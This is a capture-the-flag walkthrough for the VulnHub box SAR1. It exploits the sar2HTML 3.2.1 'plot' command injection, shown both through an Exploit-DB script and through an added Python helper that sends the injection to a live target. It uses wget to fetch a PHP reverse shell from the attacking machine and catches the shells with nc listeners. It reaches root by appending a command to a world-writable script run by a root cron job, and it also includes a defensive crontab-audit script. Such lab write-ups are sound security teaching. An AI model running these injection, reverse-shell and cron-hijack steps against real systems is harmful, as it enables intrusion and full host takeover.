VulnHub: SAR1 Walkthrough


SAR1 is another intentionally vulnerable box on VulnHub, by love.

Enumeration

Starting enumeration with AutoRecon.

Nmap scan report for 192.168.50.149
Host is up, received arp-response (0.0063s latency).
Scanned at 2021-12-28 20:06:40 EST for 10s
Not shown: 999 closed ports
Reason: 999 resets
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))

Only one port is open, and the landing page is the Apache default page, so we turn to the directory brute-force results.

200      375l      964w    10918c http://192.168.50.149/index.html
200     1170l     5860w        0c http://192.168.50.149/phpinfo.php
200        1l        1w        9c http://192.168.50.149/robots.txt
403        9l       28w      279c http://192.168.50.149/server-status

/index.html is the Apache default page.

/phpinfo.php exposes the full PHP environment configuration.

/robots.txt has a single entry: /sar2HTML.

Browsing to /sar2HTML brings up the sar2HTML web interface.

A quick Google search shows sar2HTML is a web front end for performance monitoring that turns sar (System Activity Reporter) data into graphs.

The installed version is sar2HTML 3.2.1, which has a known unauthenticated command injection: the plot parameter of index.php is passed to a shell without sanitisation, so a request to /sar2HTML/index.php?plot=;<cmd> runs <cmd> as the web server user.

Initial Foothold

Exploit-DB script 49344.py (sar2HTML 3.2.1 'plot' RCE) automates the injection: it prompts for the base URL and a command, requests index.php?plot=;<command>, and prints what comes back.

┌──(root💀kali)-[~]
└─# python3 49344.py             
Enter The url => http://192.168.50.149/sar2HTML/
Command => whoami
HPUX
Linux
SunOS
www-data

And we have command execution on the target as www-data. (The HPUX/Linux/SunOS lines are the page's OS-selector options, which the script prints along with the command output.)
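As an added example (not the page's 49344.py and not sar2HTML's own code), the following Python builds the injection URL with the command percent-encoded and pulls the output back out of the response. It assumes, as the public exploit does, that sar2HTML returns each line of command output as an <option> element after the fixed HPUX/Linux/SunOS OS-selector entries; the sample response is constructed rather than captured, and run_command is the only function that touches the network.

```python
"""Added example (not the page's 49344.py, not sar2HTML code): build the
sar2HTML 3.2.1 'plot' injection URL and recover command output from the
response. Assumes, like the public exploit, that each output line comes back
as an <option> element after the fixed HPUX/Linux/SunOS entries."""
from __future__ import annotations

import urllib.request
from html.parser import HTMLParser
from urllib.parse import quote

# sar2HTML's OS selector; everything after these three is command output.
OS_OPTIONS = ("HPUX", "Linux", "SunOS")


def build_injection_url(base_url: str, command: str) -> str:
    """Return <base>/index.php?plot=;<cmd> with the command percent-encoded.

    The walkthrough pastes the command raw; encoding keeps spaces, '&' and
    '#' inside the shell command from being mangled by the URL parser.
    """
    return f"{base_url.rstrip('/')}/index.php?plot=;{quote(command, safe='')}"


class _OptionCollector(HTMLParser):
    """Collect the text of every <option> element in the response body."""

    def __init__(self) -> None:
        super().__init__()
        self.options: list[str] = []
        self._buf: list[str] | None = None

    def handle_starttag(self, tag, attrs):
        if tag == "option":
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "option" and self._buf is not None:
            self.options.append("".join(self._buf).strip())
            self._buf = None


def extract_command_output(html: str) -> list[str]:
    """Drop the OS-selector entries and return the injected command's lines."""
    parser = _OptionCollector()
    parser.feed(html)
    lines = parser.options
    if tuple(lines[:3]) == OS_OPTIONS:
        lines = lines[3:]
    return [line for line in lines if line]


def run_command(base_url: str, command: str, timeout: float = 10.0) -> list[str]:
    """Fire the injection at a live target (network) and return its output."""
    url = build_injection_url(base_url, command)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return extract_command_output(resp.read().decode(errors="replace"))


# Constructed sample response modelled on what the script printed for
# `whoami`; not captured from a real sar2HTML instance.
SAMPLE_RESPONSE = """<select name="ostype">
<option value="HPUX">HPUX</option>
<option value="Linux">Linux</option>
<option value="SunOS">SunOS</option>
<option value="www-data">www-data</option>
</select>"""

if __name__ == "__main__":
    print(build_injection_url("http://192.168.50.149/sar2HTML/", "id; uname -a"))
    print(extract_command_output(SAMPLE_RESPONSE))
```

Against a live box, run_command("http://192.168.50.149/sar2HTML/", "id") would do what the script's prompt loop does; the percent-encoding matters once the command contains characters like & or # that the walkthrough's raw URL would otherwise hand to the web server instead of the shell.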

Next, upgrade this to a proper interactive shell.

My first attempt was with nc; however, the shell didn't return any output.

Since the commands run from inside the web root (/var/www/html/sar2HTML), I instead fetched a PHP reverse shell onto the box with wget, served from the attacking machine, and triggered it by requesting the file in a browser.

Command => pwd
HPUX
Linux
SunOS
/var/www/html/sar2HTML

Command => wget http://192.168.50.129/php_reverse_shell.php

Command =>

Set up an nc listener on the port configured in the PHP reverse shell (443 here) and request the URL.

http://192.168.50.149/sar2HTML/php_reverse_shell.php

┌──(root💀kali)-[~]
└─# nc -nlvp 443             
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.149] 51168
SOCKET: Shell has connected! PID: 3605
whoami
www-data
/bin/bash -i
/bin/bash: 0: can't access tty; job control turned off
www-data@sar:/var/www/html/sar2HTML$

We now have a shell as www-data.

Privilege Escalation

A little more enumeration turns up the kernel version; public exploits exist for it, but none of them worked here.

More usefully, /etc/crontab contains a root job that runs every five minutes.

www-data@sar:/var/www/html$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

Looking at the contents of finally.sh and the script it calls:

www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh

#!/bin/sh

./write.sh

www-data@sar:/var/www/html$ cat write.sh
cat write.sh 

#!/bin/sh

touch /tmp/gateway

finally.sh only runs ./write.sh (resolved relative to /var/www/html, the directory the cron entry changes into), and write.sh only touches /tmp/gateway.

Since cron runs finally.sh as root, anything we put into write.sh will execute as root within five minutes. If write.sh is writable by us, we can make it send a reverse shell back to our machine.

www-data@sar:/var/www/html$ ls -la
ls -la
drwxr-xr-x 3 www-data www-data  4096 Oct 21  2019 .
drwxr-xr-x 4 www-data www-data  4096 Oct 21  2019 ..
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20  2019 index.html
-rw-r--r-- 1 www-data www-data    21 Oct 20  2019 phpinfo.php
-rw-r--r-- 1 root     root         9 Oct 21  2019 robots.txt
drwxr-xr-x 4 www-data www-data  4096 Dec 29 17:35 sar2HTML
-rwxrwxrwx 1 www-data www-data    30 Oct 21  2019 write.sh

finally.sh is owned by root and not writable by us, but write.sh is owned by www-data and world-writable (-rwxrwxrwx), so we can modify it.
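The same chain can be found mechanically. The following Python is an added example, not part of the walkthrough: it parses a system crontab, takes each root job that ends in a ./script or /abs/script invocation, follows ./name calls inside that script the way finally.sh calls write.sh, and reports any script in the chain that group or world can write. build_fixture recreates the box's layout (finally.sh 0755 calling write.sh 0777, plus the crontab lines from the page) in a temporary directory so it runs offline; the path and the crontab text in that fixture are constructed.

```python
"""Added example (not from the walkthrough): audit /etc/crontab for root jobs
whose script call chain contains a file writable by lower-privileged users.
The fixture rebuilds the box's finally.sh -> write.sh layout in a temp dir."""
from __future__ import annotations

import re
import stat
import tempfile
from pathlib import Path

# /etc/crontab job line: five schedule fields, the user, then the command.
CRON_RE = re.compile(r"^\s*(\S+(?:\s+\S+){4})\s+(\S+)\s+(.+)$")
CD_RE = re.compile(r"\bcd\s+(\S+)")
# A script line that just invokes another script by path, optionally via
# sudo/sh/bash; this is the ./write.sh pattern inside finally.sh.
CALL_RE = re.compile(r"^\s*(?:sudo\s+|sh\s+|bash\s+)?(\.?/[\w./-]+)\s*$", re.M)


def target_script(command: str) -> str | None:
    """Return the script path the job ultimately runs, or None if the final
    command is a plain program such as run-parts rather than a path."""
    last = command.split("&&")[-1].strip().rstrip(") ").split()
    if last and last[0] == "sudo":
        last = last[1:]
    if last and (last[0].startswith("./") or last[0].startswith("/")):
        return last[0]
    return None


def follow_calls(script: Path, cwd: Path, seen: list[Path]) -> list[Path]:
    """Collect the script and, recursively, every script it calls by path.
    Relative paths resolve against cwd, the directory the job cd's into."""
    script = script if script.is_absolute() else cwd / script
    if script in seen or not script.is_file():
        return seen
    seen.append(script)
    for m in CALL_RE.finditer(script.read_text(errors="replace")):
        follow_calls(Path(m.group(1)), cwd, seen)
    return seen


def others_writable(p: Path) -> bool:
    """Group- or world-writable: anyone in that set can plant root commands."""
    return bool(p.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_crontab(crontab_text: str) -> list[dict]:
    """One finding per (root job, writable script in its call chain)."""
    findings = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue  # blank, comment, or SHELL=/PATH= assignment
        m = CRON_RE.match(line)
        if not m or m.group(2) != "root":
            continue
        schedule, _, command = m.groups()
        cd = CD_RE.search(command)
        cwd = Path(cd.group(1)) if cd else Path("/")
        script = target_script(command)
        if script is None:
            continue
        for p in follow_calls(Path(script), cwd, []):
            if others_writable(p):
                findings.append({"schedule": schedule, "job": command,
                                 "script": str(p),
                                 "mode": oct(p.stat().st_mode & 0o777)})
    return findings


def build_fixture() -> tuple[Path, str]:
    """Constructed fixture: finally.sh (0755) calling write.sh (0777) in a
    temp dir, and a crontab with stock Ubuntu lines plus the */5 root job."""
    root = Path(tempfile.mkdtemp(prefix="sar-"))
    (root / "finally.sh").write_text("#!/bin/sh\n\n./write.sh\n")
    (root / "finally.sh").chmod(0o755)
    (root / "write.sh").write_text("#!/bin/sh\n\ntouch /tmp/gateway\n")
    (root / "write.sh").chmod(0o777)
    crontab = f"""SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/5  *    * * *   root    cd {root}/ && sudo ./finally.sh
"""
    return root, crontab


if __name__ == "__main__":
    _, text = build_fixture()
    for f in audit_crontab(text):
        print(f"{f['schedule']} root {f['job']}\n  -> {f['script']} is {f['mode']}")
```

On the real box you would feed it the contents of /etc/crontab (and, with small changes, the files under /etc/cron.d); the interesting property it checks is exactly the one exploited here: finally.sh itself is root-owned and untouchable, but its call chain passes through a world-writable file.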

php_reverse_shell.php is already on the box under /var/www/html/sar2HTML, so we can reuse it.

Append a line that runs it with the PHP command-line interpreter. The path must be absolute (or relative to /var/www/html, where the cron job runs), and php must be on the PATH the crontab sets, which includes /usr/bin:

www-data@sar:/var/www/html$ echo 'php /var/www/html/sar2HTML/php_reverse_shell.php' >>write.sh

Set up the listener again; when the cron job next fires (at most five minutes later), a shell connects back as root.

┌──(root💀kali)-[~]
└─# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.149] 37390
SOCKET: Shell has connected! PID: 3174
whoami
root
cd /root
ls
root.txt
snap
cat root.txt
66f93d6b2ca96c9ad78a8a9ba0008e99

And we have our root flag.

Thanks for reading.